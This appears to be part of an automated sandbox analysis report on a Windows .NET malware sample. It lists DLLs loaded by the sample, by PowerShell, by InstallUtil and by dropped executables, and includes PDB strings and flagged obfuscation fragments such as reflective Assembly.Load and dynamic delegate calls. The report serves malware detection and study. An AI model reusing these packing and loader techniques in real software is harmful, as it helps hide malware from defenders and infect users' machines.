Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Fbedztzxbbe.pdb source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs .Net Code: Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777370)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777248)),Type.GetTypeFromHandle(Khmx1Yt6SBxTndHcLiS.yA0DXaCBy7(16777334))})
.NET source code contains potential unpacker
Source: file.exe, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
